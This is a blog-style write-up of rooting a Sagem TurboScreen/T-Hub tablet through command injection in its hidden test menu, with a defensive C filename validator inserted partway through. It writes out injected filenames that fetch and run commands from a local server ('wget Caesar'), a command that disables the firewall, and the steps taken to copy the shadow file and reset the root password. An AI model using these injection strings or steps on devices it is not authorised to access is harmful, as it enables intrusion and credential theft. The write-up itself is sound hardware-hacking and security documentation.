Today I acquired another TurboScreen, and instead of diving headlong into serious software and hardware hacks again, I decided to have another look at the Hidden Menu.
Like most test software, the menu isn't designed for consumer use. It has bugs, crashes, is ugly and some parts just plain old don't work. It has all the hallmarks of having been put together in a real hurry. This got me thinking - if Sagem slapped it together for internal use, there's a real chance that they didn't do a great job of making it terribly sane or secure, right? So I started reading through the code.
Two functions caught my eye fairly quickly. One is the firmware update utility, which runs a fairly poor regex against the file list on a USB stick to look for firmware it recognises. For instance, it'll happily swallow a file I named "001.001.001.bin;reboot", and the device reboots just as one would expect. This looked very promising for getting root access, but there's one serious issue: the command strips all the spaces out of the filename, so you can forget trying to pass any arguments. Dead end.
The second function is used in the testing of USB storage devices. It simply plays an audio file from a USB flash drive through the speakers. The restriction on this is that the filename must end in .wav, and like the firmware update function it does not do any sanitisation of the string. It even leaves the spaces in.
Given that my input is in the form of a filename, I am prevented from using characters like pipes and slashes in my command. Initially this looked to be a bit of an issue, but it isn't. I recruited my friendly neighbourhood domain controller and fileserver, Caesar, and installed IIS on it. Then I stuck the real command I wanted to run into the index.html. By adjusting the filename to look something like this:
"test; $(wget Caesar -O-); .wav"
I was able to cause the T-Hub to download the command list from Caesar and then execute it. As root. By doing it this way I get around all character limitations.
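The root cause in both menu functions is that a filename read off the USB stick is handed to a shell unsanitised. Below is a hardened version of the audio-test routine, added here as an example (it is not Sagem's code; the `aplay` player, the mount path and the name limits are assumptions): the name is checked against a strict allowlist and the player is exec'd with an argv array, so no shell ever sees the filename.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define MAX_NAME 64  /* assumed limit for a basename on the stick */

/* Return 1 if name is a plain "basename.wav" built only from [A-Za-z0-9._-]
 * (no spaces, no path separators, no shell metacharacters, no leading dot),
 * 0 otherwise. Allowlisting beats trying to strip "bad" characters. */
int is_safe_wav_name(const char *name) {
    size_t len = strlen(name);
    if (len < 5 || len >= MAX_NAME) return 0;          /* at least "x.wav" */
    if (strcmp(name + len - 4, ".wav") != 0) return 0; /* must end in .wav */
    if (name[0] == '.') return 0;                       /* no dotfiles, no ".." */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-')) return 0;
    }
    return 1;
}

/* Play a validated file by exec'ing the player directly with an argv array,
 * so the filename is never interpreted by /bin/sh (unlike system()).
 * Returns the player's exit status, or -1 on rejected input or spawn failure. */
int play_wav_safe(const char *mount, const char *name) {
    if (!is_safe_wav_name(name)) return -1;
    char path[256];
    if (snprintf(path, sizeof path, "%s/%s", mount, name) >= (int)sizeof path)
        return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "aplay", path, NULL };  /* hypothetical player */
        execvp("aplay", argv);
        _exit(127);  /* only reached if exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The validator rejects both filenames from this post outright, so the injection never reaches a command line in the first place.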
Getting close now.
The first command I tried, having seen that the system has iptables installed, was this:
"iptables -I INPUT -j ACCEPT"
This effectively disabled the firewall on my tablet. I was then able to see an SSH server, but I still had no credentials. The next thing I did (after figuring out that the USB stick mounts itself read-only on the tablet) was to grab the shadow file from the device and copy it onto the USB stick. On examination, I discovered the username/password combination user:user, which got me into SSH, albeit as an unprivileged user.
I had previously tried to overwrite the shadow file, but it had been failing silently, which I suspected was because the root filesystem was read only. Now that I had a session, I was able to quickly confirm this. I crafted another command that would remount the UBIFS rootfs with write permission and then set shadow to have global write permissions. Once this was done, I adjusted the root password to a known value and connected to SSH again. I had root!
For finishing touches, I went into the iptables_start.sh script and created an exception for the SSH server. This means that I can now connect to SSH as root without having to do any command injection trickery.
This box is mine.